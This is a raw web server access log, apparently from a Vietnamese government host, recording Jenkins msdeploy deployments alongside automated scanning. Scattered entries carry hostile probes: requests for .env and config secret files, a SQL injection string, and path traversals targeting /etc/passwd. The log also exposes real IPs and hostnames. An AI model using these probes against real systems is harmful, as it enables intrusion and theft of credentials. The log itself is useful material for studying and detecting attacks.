MSDeployExe;sid=7de48afc-6eb6-4172-9122-fe5776c10ab0;op=Sync - 200 0 0 484 2024-12-12 03:16:57 103.153.214.94 POST /msdeploy.axd Site=kiemkegpmb.gdtsolutions.vn 8172 jenkins 119.82.130.75 - - 200 0 0 581 2024-12-12 03:16:57 103.153.214.94 HEAD /msdeploy.axd Site=kiemkegpmb.gdtsolutions.vn 8172 jenkins 119.82.130.75 - - 200 0 0 8 2024-12-12 03:17:59 103.153.214.94 POST /msdeploy.axd Site=kiemkegpmb.gdtsolutions.vn 8172 jenkins 119.82.130.75 MSDeployExe;sid=7de48afc-6eb6-4172-9122-fe5776c10ab0;op=Sync - 200 0 0 60699 2024-12-12 03:17:59 103.153.214.94 POST /msdeploy.axd Site=kiemkegpmb.gdtsolutions.vn 8172 jenkins 119.82.130.75 - - 200 0 0 60723 2024-12-12 03:18:42 103.153.214.94 POST /ViewPoint/admin/Site/ViewPointLogin - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh,+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.5+Safari/605.1.15 - 404 7 0 70 2024-12-12 03:18:42 103.153.214.94 POST /VisionHubWebApi/api/Login - 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/60.0.3112.113+Safari/537.36 - 404 7 0 92 2024-12-12 03:20:06 103.153.214.94 GET /signin - 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/90.0.4430.212+Safari/537.36 - 404 7 0 36 2024-12-12 03:20:33 103.153.214.94 POST /login.cgi - 8172 - 206.238.196.225 Mozilla/5.0+(Kubuntu;+Linux+i686;+rv:128.0)+Gecko/20100101+Firefox/128.0 - 404 7 0 59 2024-12-12 03:23:37 103.153.214.94 GET / - 8172 - 206.238.196.225 Mozilla/5.0+(Knoppix;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/122.0.0.0+Safari/537.36 - 404 7 0 55 2024-12-12 03:23:59 103.153.214.94 GET /invoke/pub.file/getFile - 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:121.0)+Gecko/20100101+Firefox/121.0 - 404 7 0 51 2024-12-12 03:24:45 103.153.214.94 POST /console/j_security_check - 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:109.0)+Gecko/20100101+Firefox/115.0 - 404 7 0 48 2024-12-12 03:24:45 103.153.214.94 GET /console/ - 8172 - 206.238.196.225 Mozilla/5.0+(Debian;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/121.0.0.0+Safari/537.36 - 404 7 0 48 2024-12-12 03:24:45 103.153.214.94 GET /console/ - 8172 - 206.238.196.225 Mozilla/5.0+(Knoppix;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/123.0.0.0+Safari/537.36 - 404 7 0 31 2024-12-12 03:24:45 103.153.214.94 POST /console/j_security_check - 8172 - 206.238.196.225 Mozilla/5.0+(SS;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/124.0.0.0+Safari/537.36 - 404 7 0 32 2024-12-12 03:24:45 103.153.214.94 POST /console/j_security_check - 8172 - 206.238.196.225 Mozilla/5.0+(X11;+CrOS+x86_64+14816.131.5)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/103.0.0.0+Safari/537.36 - 404 7 0 32 2024-12-12 03:24:45 103.153.214.94 GET /console/ - 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/100.0.4896.127+Safari/537.36 - 404 7 0 37 2024-12-12 03:24:45 103.153.214.94 GET /console/ - 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/100.0.4896.127+Safari/537.36 - 404 7 0 36 2024-12-12 03:24:45 103.153.214.94 POST /console/j_security_check - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.3+Safari/605.1.15 - 404 7 0 36 2024-12-12 03:24:45 103.153.214.94 POST /console/j_security_check - 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/95.0.4638.54+Safari/537.36 - 404 7 0 37 2024-12-12 03:24:45 103.153.214.94 GET /console/ - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/15.3+Safari/605.1.15 - 404 7 0 49 2024-12-12 03:24:45 103.153.214.94 GET /console/ - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10.15;+rv:124.0)+Gecko/20100101+Firefox/124.0 - 404 7 0 51 2024-12-12 03:24:45 103.153.214.94 GET /console/ - 8172 - 206.238.196.225 Mozilla/5.0+(ZZ;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/125.0.0.0+Safari/537.36 - 404 7 0 56 2024-12-12 03:24:45 103.153.214.94 POST /console/j_security_check - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.4+Safari/605.8.22 - 404 7 0 56 2024-12-12 03:24:45 103.153.214.94 POST /console/j_security_check - 8172 - 206.238.196.225 Mozilla/5.0+(ZZ;+Linux+x86_64;+rv:123.0)+Gecko/20100101+Firefox/123.0 - 404 7 0 56 2024-12-12 03:24:45 103.153.214.94 POST /console/j_security_check - 8172 - 206.238.196.225 Mozilla/5.0+(Fedora;+Linux+x86_64;+rv:128.0)+Gecko/20100101+Firefox/128.0 - 404 7 0 55 2024-12-12 03:24:45 103.153.214.94 GET /console/ - 8172 - 206.238.196.225 Mozilla/5.0+(ZZ;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/121.0.0.0+Safari/537.36 - 404 7 0 57 2024-12-12 03:25:02 103.153.214.94 POST /session_login.cgi - 8172 - 206.238.196.225 Mozilla/5.0+(ZZ;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/129.0.0.0+Safari/537.36 https://bcvt.kontum.gov.vn:8172 404 7 0 32 2024-12-12 03:25:02 103.153.214.94 GET /sysinfo.cgi - 8172 - 206.238.196.225 Mozilla/5.0+(ZZ;+Linux+i686;+rv:122.0)+Gecko/20100101+Firefox/122.0 https://bcvt.kontum.gov.vn:8172 404 7 0 65 2024-12-12 03:31:26 103.153.214.94 POST /login.php action=login&type=admin 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10.15;+rv:109.0)+Gecko/20100101+Firefox/116.0 - 404 7 0 76 2024-12-12 03:31:28 103.153.214.94 GET /management - 8172 - 206.238.196.225 Mozilla/5.0+(Fedora;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/125.0.0.0+Safari/537.36 - 404 7 0 33 2024-12-12 03:35:41 103.153.214.94 GET /authenticate - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.1+Safari/605.4.21 - 404 7 0 49 2024-12-12 03:38:44 103.153.214.94 POST /carbon/admin/login_action.jsp - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.3.1+Safari/605.1.1+20.51 - 404 7 0 38 2024-12-12 03:38:44 103.153.214.94 POST /userpost/xerox.set - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/101.0.0.0+Safari/537.36 - 404 7 0 34 2024-12-12 03:38:44 103.153.214.94 POST /login - 8172 - 206.238.196.225 Mozilla/5.0+(Ubuntu;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/125.0.0.0+Safari/537.36 - 404 7 0 38 2024-12-12 03:40:02 103.153.214.94 POST /login - 8172 - 206.238.196.225 Mozilla/5.0+(CentOS;+Linux+i686;+rv:122.0)+Gecko/20100101+Firefox/122.0 https://bcvt.kontum.gov.vn:8172/login 404 7 0 57 2024-12-12 03:41:16 103.153.214.94 POST /api/auth/login p=Login&t=1 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.5+Safari/605.6.22 - 404 7 0 65 2024-12-12 03:41:18 103.153.214.94 POST /login - 8172 - 206.238.196.225 Mozilla/5.0+(Ubuntu;+Linux+i686;+rv:125.0)+Gecko/20100101+Firefox/125.0 - 404 7 0 32 2024-12-12 03:41:18 103.153.214.94 POST /xxl-job-admin/login - 8172 - 206.238.196.225 Mozilla/5.0+(CentOS;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/128.0.0.0+Safari/537.36 - 404 7 0 48 2024-12-12 03:41:22 103.153.214.94 POST /index.php - 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+6.1;+WOW64;+rv:50.0)+Gecko/20100101+Firefox/50.0 - 404 7 0 56 2024-12-12 03:41:22 103.153.214.94 POST /zabbix/index.php - 8172 - 206.238.196.225 Mozilla/5.0+(SS;+Linux+i686;+rv:123.0)+Gecko/20100101+Firefox/123.0 - 404 7 0 55 2024-12-12 03:47:00 103.153.214.94 GET /app/login - 8172 - 206.238.196.225 Mozilla/5.0+(ZZ;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/122.0.0.0+Safari/537.36 - 404 7 0 39 2024-12-12 03:52:33 103.153.214.94 GET / - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/15.5+Safari/605.1.15 - 404 7 0 41 2024-12-12 03:52:54 103.153.214.94 POST / - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.4.1+Safari/605.9.25 - 404 7 0 45 2024-12-12 03:53:14 103.153.214.94 GET / p 8172 - 206.238.196.225 Mozilla/5.0+(X11;+U;+Linux+i686;+en-US)+AppleWebKit/534.1+SUSE/6.0.428.0+(KHTML,+like+Gecko)+Chrome/6.0.428.0+Safari/534.1 - 404 7 0 40 2024-12-12 04:06:10 103.153.214.94 POST /authorize - 8172 - 206.238.196.225 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/129.0.0.0+Safari/537.36 - 404 7 0 37 2024-12-12 04:06:10 103.153.214.94 POST /authorize - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.5+Safari/605.8.24 - 404 7 0 63 2024-12-12 04:07:19 103.153.214.94 GET / - 8172 - 162.216.150.126 Expanse,+a+Palo+Alto+Networks+company,+searches+across+the+global+IPv4+space+multiple+times+per+day+to+identify+customers'+presences+on+the+Internet.+If+you+would+like+to+be+excluded+from+our+scans,+please+send+IP+addresses/domains+to:+scaninfo@paloaltonetworks.com - 404 7 0 283 2024-12-12 04:11:59 103.153.214.94 POST /ZMC_Admin_Login - 8172 - 206.238.196.225 Mozilla/5.0+(Ubuntu;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/118.0.0.0+Safari/537.36 - 404 7 0 54 2024-12-12 04:13:08 103.153.214.94 GET /.env.prod.local - 8172 - 206.238.196.225 Mozilla/5.0+(CentOS;+Linux+i686;+rv:121.0)+Gecko/20100101+Firefox/121.0 - 404 7 0 40 2024-12-12 04:13:08 103.153.214.94 GET /.env.local - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+15_5_7;+es)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.0.7+Safari/605.1.15 - 404 7 0 37 2024-12-12 04:13:08 103.153.214.94 GET /.env.production.local - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.4.1+Safari/605.1.79 - 404 7 0 37 2024-12-12 04:13:08 103.153.214.94 GET /.env.example - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.5+Safari/605.1.18 - 404 7 0 36 2024-12-12 04:13:08 103.153.214.94 GET /.env.live - 8172 - 206.238.196.225 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/116.0.0.0+Safari/537.36 - 404 7 0 44 2024-12-12 04:13:08 103.153.214.94 GET /.env - 8172 - 206.238.196.225 Mozilla/5.0+(X11;+Linux+x86_64;+rv:12.0)+Gecko/20100101+Firefox/12.0 - 404 7 0 45 2024-12-12 04:13:08 103.153.214.94 GET /.env.dev.local - 8172 - 206.238.196.225 Mozilla/5.0+(ZZ;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/118.0.0.0+Safari/537.36 - 404 7 0 43 2024-12-12 04:13:08 103.153.214.94 GET /.env.old - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_6)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/15.6.6+Safari/605.1.15 - 404 7 0 44 2024-12-12 04:13:08 103.153.214.94 GET /.env_sample - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.4.1+Safari/605.9.16 - 404 7 0 42 2024-12-12 04:13:08 103.153.214.94 GET /.env_1 - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.4.1+Safari/605.1.51 - 404 7 0 44 2024-12-12 04:13:08 103.153.214.94 GET /.env.development.local - 8172 - 206.238.196.225 Mozilla/5.0+(SS;+Linux+x86_64;+rv:125.0)+Gecko/20100101+Firefox/125.0 - 404 7 0 37 2024-12-12 04:13:08 103.153.214.94 GET /.env.stage - 8172 - 206.238.196.225 Mozilla/5.0+(SS;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/129.0.0.0+Safari/537.36 - 404 7 0 60 2024-12-12 04:17:39 103.153.214.94 GET /.env.bak - 8172 - 206.238.196.225 Mozilla/5.0+(Ubuntu;+Linux+x86_64;+rv:128.0)+Gecko/20100101+Firefox/128.0 - 404 7 0 78 2024-12-12 04:17:39 103.153.214.94 GET /.env.production.local - 8172 - 206.238.196.225 Mozilla/5.0+(ZZ;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/125.0.0.0+Safari/537.36 - 404 7 0 67 2024-12-12 04:17:39 103.153.214.94 GET /.env.development.local - 8172 - 206.238.196.225 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Safari/537.36+HeyTapBrowser/45.11.0.1.1+Chrome/91.0.4472.88 - 404 7 0 77 2024-12-12 04:17:39 103.153.214.94 GET /.env - 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:75.0)+Gecko/20100101+Firefox/75.0 - 404 7 0 78 2024-12-12 04:17:39 103.153.214.94 GET /.env.backup - 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:109.0)+Gecko/20100101+Firefox/116.0 - 404 7 0 79 2024-12-12 04:17:39 103.153.214.94 GET /.env.www - 8172 - 206.238.196.225 Mozilla/5.0+(X11;+Ubuntu;+Linux+x86_64;+rv:123.0)+Gecko/20100101+Firefox/123.0 - 404 7 0 79 2024-12-12 04:17:39 103.153.214.94 GET /.env_1 - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.4+Safari/605.1.15 - 404 7 0 79 2024-12-12 04:17:39 103.153.214.94 GET /.env.save - 8172 - 206.238.196.225 Mozilla/5.0+(Knoppix;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/121.0.0.0+Safari/537.36 - 404 7 0 77 2024-12-12 04:17:39 103.153.214.94 GET /.env.stage - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.5+Safari/605.8.19 - 404 7 0 78 2024-12-12 04:17:39 103.153.214.94 GET /.env.bcvt - 8172 - 206.238.196.225 Mozilla/5.0+(X11;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/123.0.0.0+Safari/537.36 - 404 7 0 78 2024-12-12 04:17:39 103.153.214.94 GET /.env.kontum - 8172 - 206.238.196.225 Mozilla/5.0+(ZZ;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/122.0.0.0+Safari/537.36 - 404 7 0 78 2024-12-12 04:17:39 103.153.214.94 GET /.env.example - 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:124.0)+Gecko/20100101+Firefox/124.0 - 404 7 0 76 2024-12-12 04:17:39 103.153.214.94 GET /.env.live - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/112.0.0.0+Safari/537.36 - 404 7 0 77 2024-12-12 04:17:39 103.153.214.94 GET /.env.old - 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+6.1;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/73.0.3683.75+Safari/537.36 - 404 7 0 77 2024-12-12 04:17:39 103.153.214.94 GET /.env.dev.local - 8172 - 206.238.196.225 Mozilla/5.0+(ZZ;+Linux+i686;+rv:122.0)+Gecko/20100101+Firefox/122.0 - 404 7 0 74 2024-12-12 04:17:39 103.153.214.94 GET /.env.local - 8172 - 206.238.196.225 Mozilla/5.0+(SS;+Linux+x86_64;+rv:125.0)+Gecko/20100101+Firefox/125.0 - 404 7 0 74 2024-12-12 04:17:39 103.153.214.94 GET /api/.env - 8172 - 206.238.196.225 Mozilla/5.0+(CentOS;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/121.0.0.0+Safari/537.36 - 404 7 0 93 2024-12-12 04:17:39 103.153.214.94 GET /.env.dev - 8172 - 206.238.196.225 Mozilla/5.0+(Kubuntu;+Linux+x86_64;+rv:123.0)+Gecko/20100101+Firefox/123.0 - 404 7 0 93 2024-12-12 04:17:39 103.153.214.94 GET /.env_sample - 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:90.0)+Gecko/20100101+Firefox/90.0 - 404 7 0 92 2024-12-12 04:17:39 103.153.214.94 GET /.env.prod - 8172 - 206.238.196.225 Mozilla/5.0+(ZZ;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/127.0.0.0+Safari/537.36 - 404 7 0 93 2024-12-12 04:17:39 103.153.214.94 GET /.env.production - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+11)+AppleWebKit/617.29+(KHTML,+like+Gecko)+Version/17.7+Safari/617.29 - 404 7 0 106 2024-12-12 04:17:39 103.153.214.94 GET /.env.prod.local - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.5+Safari/605.6.27 - 404 7 0 99 2024-12-12 04:20:41 103.153.214.94 GET /login - 8172 - 206.238.196.225 Mozilla/5.0+(Fedora;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/122.0.0.0+Safari/537.36 - 404 7 0 43 2024-12-12 04:21:07 103.153.214.94 POST /login - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_14_6)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/14.1.2+Safari/605.1.15 - 404 7 0 46 2024-12-12 04:23:17 103.153.214.94 HEAD /msdeploy.axd Site=kiemkegpmb.gdtsolutions.vn 8172 - 119.82.130.75 - - 401 2 5 15 2024-12-12 04:23:17 103.153.214.94 HEAD /msdeploy.axd Site=kiemkegpmb.gdtsolutions.vn 8172 jenkins 119.82.130.75 - - 200 0 0 186 2024-12-12 04:23:17 103.153.214.94 HEAD /msdeploy.axd Site=kiemkegpmb.gdtsolutions.vn 8172 jenkins 119.82.130.75 - - 200 0 0 18 2024-12-12 04:23:17 103.153.214.94 POST /msdeploy.axd Site=kiemkegpmb.gdtsolutions.vn 8172 jenkins 119.82.130.75 MSDeployExe;sid=536236be-e258-4957-a9eb-c2f58fa7672a;op=Sync - 200 0 0 402 2024-12-12 04:23:17 103.153.214.94 POST /msdeploy.axd Site=kiemkegpmb.gdtsolutions.vn 8172 jenkins 119.82.130.75 - - 200 0 0 470 2024-12-12 04:23:17 103.153.214.94 HEAD /msdeploy.axd Site=kiemkegpmb.gdtsolutions.vn 8172 jenkins 119.82.130.75 - - 200 0 0 11 2024-12-12 04:23:19 103.153.214.94 POST /WEB_VMS/LEVEL15/ - 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:94.0)+Gecko/20100101+Firefox/94.0 - 404 7 0 61 2024-12-12 04:24:18 103.153.214.94 POST /msdeploy.axd Site=kiemkegpmb.gdtsolutions.vn 8172 jenkins 119.82.130.75 MSDeployExe;sid=536236be-e258-4957-a9eb-c2f58fa7672a;op=Sync - 200 0 0 60080 2024-12-12 04:24:18 103.153.214.94 POST /msdeploy.axd Site=kiemkegpmb.gdtsolutions.vn 8172 jenkins 119.82.130.75 - - 200 0 0 60124 2024-12-12 04:29:05 103.153.214.94 GET /radio/application/configs/application.ini - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_14_5)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/78.0.3904.108+Safari/537.36 - 404 7 0 35 2024-12-12 04:29:05 103.153.214.94 GET /aplicacao/application/configs/application.ini - 8172 - 206.238.196.225 Mozilla/5.0+(X11;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/118.0.0.0+Safari/537.36 - 404 7 0 45 2024-12-12 04:29:05 103.153.214.94 GET /Partners/application/configs/application.ini - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10.13;+rv:70.0)+Gecko/20100101+Firefox/70.0 - 404 7 0 55 2024-12-12 04:29:05 103.153.214.94 GET /cms/application/configs/application.ini - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/102.0.0.0+Safari/537.36 - 404 7 0 32 2024-12-12 04:29:05 103.153.214.94 GET /site_cg/application/configs/application.ini - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.2.1+Safari/605.1.65 - 404 7 0 32 2024-12-12 04:29:05 103.153.214.94 GET /admin/configs/application.ini - 8172 - 206.238.196.225 Mozilla/5.0+(ZZ;+Linux+x86_64;+rv:126.0)+Gecko/20100101+Firefox/126.0 - 404 7 0 39 2024-12-12 04:29:05 103.153.214.94 GET /application/configs/application.ini - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_12_4)+AppleWebKit/537.36+(KHTML,+like+Gecko)++++Chrome/55.0.2883.95+Safari/537.36 - 404 7 0 32 2024-12-12 04:29:05 103.153.214.94 GET /seminovos/application/configs/application.ini - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.0.1+Mobile/15E148+Safari/604.1 - 404 7 0 32 2024-12-12 04:29:05 103.153.214.94 GET /moto/application/configs/application.ini - 8172 - 206.238.196.225 Mozilla/5.0+(X11;+Linux+i686;+rv:127.0)+Gecko/20100101+Firefox/127.0 - 404 7 0 55 2024-12-12 04:29:05 103.153.214.94 GET /cloudexp/application/configs/application.ini - 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:109.0)+Gecko/20100101+Firefox/117.0 - 404 7 0 55 2024-12-12 04:29:05 103.153.214.94 GET /shop/application/configs/application.ini - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.1+Safari/605.2.22 - 404 7 0 55 2024-12-12 04:29:05 103.153.214.94 GET /slr/application/configs/application.ini - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/123.0.0.0+Safari/537.36 - 404 7 0 56 2024-12-12 04:29:05 103.153.214.94 GET /application.ini - 8172 - 206.238.196.225 Mozilla/5.0+(X11;+Linux+i686;+rv:126.0)+Gecko/20100101+Firefox/126.0 - 404 7 0 55 2024-12-12 04:35:48 103.153.214.94 GET /public/index.php s=/index/qrcode/download/url/L2V0Yy9wYXNzd2Q= 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10.15;+rv:123.0)+Gecko/20100101+Firefox/123.0 - 404 7 0 219 2024-12-12 04:35:48 103.153.214.94 GET /servlet/codesettree flag=c&status=1&codesetid=1&parentid=-1&categories=~31~27~20union~20all~20select~20~27hongjing~27~2c~40~40version~2d~2d 8172 - 156.251.25.152 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/45.0.2454.101+Safari/537.36 - 404 7 0 223 2024-12-12 04:35:49 103.153.214.94 POST /dataSetParam/verification;swagger-ui/ - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+14.6)+AppleWebKit/616.20+(KHTML,+like+Gecko)+Version/17.1.83+Safari/616.20 - 404 7 0 207 2024-12-12 04:35:49 103.153.214.94 POST /weaver/org.apache.xmlrpc.webserver.XmlRpcServlet - 8172 - 156.251.25.152 Mozilla/5.0+(Ubuntu;+Linux+i686;+rv:124.0)+Gecko/20100101+Firefox/124.0 - 404 7 0 219 2024-12-12 04:35:49 103.153.214.94 GET / - 8172 - 156.251.25.152 Mozilla/5.0+(CentOS;+Linux+x86_64;+rv:127.0)+Gecko/20100101+Firefox/127.0 - 404 7 0 200 2024-12-12 04:35:52 103.153.214.94 POST /mobile/plugin/browser.jsp - 8172 - 156.251.25.152 Mozilla/5.0+(Knoppix;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/129.0.0.0+Safari/537.36 - 404 7 0 201 2024-12-12 04:35:52 103.153.214.94 POST /zentao/user-login.html - 8172 - 156.251.25.152 Mozilla/5.0+(Kubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/122.0.0.0+Safari/537.36 https://bcvt.kontum.gov.vn:8172/zentao/user-login.html 404 7 0 200 2024-12-12 04:35:52 103.153.214.94 POST /bsh.servlet.BshServlet - 8172 - 156.251.25.152 Mozilla/5.0+(X11;+Linux+x86_64;+rv:68.0)+Gecko/20100101+Firefox/68.0 - 404 7 0 208 2024-12-12 04:35:52 103.153.214.94 POST /index.php/User/doLogin - 8172 - 156.251.25.152 Mozilla/5.0+(X11;+Ubuntu;+Linux+x86_64;+rv:127.0)+Gecko/20100101+Firefox/127.0 - 404 7 0 206 2024-12-12 04:35:53 103.153.214.94 POST /webadm/ q=moni_detail.do&action=gragh 8172 - 156.251.25.152 Mozilla/5.0+(Kubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/128.0.0.0+Safari/537.36 - 404 7 0 200 2024-12-12 04:35:53 103.153.214.94 POST /uapjs/jsinvoke/ action=invoke 8172 - 156.251.25.152 Mozilla/5.0+(X11;+CrOS+x86_64+14541.0.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/122.0.0.0+Safari/537.36 - 404 7 0 201 2024-12-12 04:35:54 103.153.214.94 GET /export/classroom-course-statistics fileNames[]=../../../../../../../etc/passwd 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.3+Safari/605.3.25 - 404 7 0 197 2024-12-12 04:35:54 